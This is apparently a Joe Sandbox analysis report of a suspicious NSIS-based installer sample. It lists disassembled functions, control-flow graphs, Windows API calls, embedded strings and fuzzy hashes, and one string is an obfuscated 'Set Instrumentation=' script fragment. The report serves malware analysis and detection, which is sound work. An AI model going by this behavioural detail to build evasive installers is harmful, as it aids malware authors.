                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                                            • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                                            • API String ID: 608394941-2746725676
                                                                                                                                                                                                                                                                                            • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                                            • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                                                                                                                                                                                                                                                            Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042B018,771B23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042B018,771B23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042B018,771B23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
                                                                                                                                                                                                                                                                                            • API String ID: 4286501637-2478300759
                                                                                                                                                                                                                                                                                            • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                                            • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                                                                                                                                                                                                                                                                            Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 638 40375f-403765 609->638 610->606 636 403797-4037a8 610->636 614 403670-403677 611->614 615 4037e9-4037f0 call 4032d2 611->615 616 4036f3-4036f7 614->616 617 403679-40368d call 405e38 614->617 615->606 623 403701-403707 616->623 624 4036f9-403700 call 4032d2 616->624 617->623 634 40368f-403696 617->634 627 403716-403720 623->627 628 403709-403713 call 4072ad 623->628 624->623 627->602 635 403726 627->635 628->627 634->623 640 403698-40369f 634->640 635->600 641 4037b0-4037b3 636->641 642 4037aa 636->642 638->606 638->610 640->623 643 4036a1-4036a8 640->643 644 4037b6-4037be 641->644 642->641 643->623 645 4036aa-4036b1 643->645 644->644 646 4037c0-4037db SetFilePointer call 405e38 644->646 645->623 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->623 653 4036ef-4036f1 651->653 652->635 652->651 653->623
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • Inst, xrefs: 00403698
                                                                                                                                                                                                                                                                                            • Null, xrefs: 004036AA
                                                                                                                                                                                                                                                                                            • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                                                                            • soft, xrefs: 004036A1
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                                            • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                                            • API String ID: 4283519449-527102705
                                                                                                                                                                                                                                                                                            • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                                            • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                                                                                                                                                                                                                                                                            Function 0040337F Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 175fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,0042B018,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • Set Instrumentation=oSiSLKennedy-Listings-Plugins-Deployment-mqzBacteria-Simplified-Trades-Luke-Posters-Southwest-Dialogue-Memorial-dqBRFrost-Naturally-sUkPPoultry-Skirts-Picked-NYlBubble-Geological-Descending-Separated-Exhaust-Tax-Eau-Use-rHfnProp, xrefs: 004033FD
                                                                                                                                                                                                                                                                                            • ... %d%%, xrefs: 004034C8
                                                                                                                                                                                                                                                                                            • pAB, xrefs: 004033AB
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                                            • String ID: ... %d%%$Set Instrumentation=oSiSLKennedy-Listings-Plugins-Deployment-mqzBacteria-Simplified-Trades-Luke-Posters-Southwest-Dialogue-Memorial-dqBRFrost-Naturally-sUkPPoultry-Skirts-Picked-NYlBubble-Geological-Descending-Separated-Exhaust-Tax-Eau-Use-rHfnProp$pAB
                                                                                                                                                                                                                                                                                            • API String ID: 651206458-2973944872
                                                                                                                                                                                                                                                                                            • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                            • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                                                                                                                                                                                                                                                                            Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00445D80,0042B018,771B23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(004034E5,00445D80,0042B018,771B23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042B018,771B23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042B018,771B23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2740478559-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                                            • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                                                                                                                                                                                                                                                                            Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 729 402713-40273b call 406035 * 2 734 402746-402749 729->734 735 40273d-402743 call 40145c 729->735 737 402755-402758 734->737 738 40274b-402752 call 40145c 734->738 735->734 741 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 737->741 742 40275a-402761 call 40145c 737->742 738->737 742->741
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                                            • String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
                                                                                                                                                                                                                                                                                            • API String ID: 247603264-1827671502
                                                                                                                                                                                                                                                                                            • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                            • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                                                                                                                                                                                                                                                            Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 750 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 761 402223-4030f2 call 4062cf 750->761 762 40220d-40221b call 4062cf 750->762 762->761
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042B018,771B23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042B018,771B23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042B018,771B23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                                            • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                                            • API String ID: 3156913733-2180253247
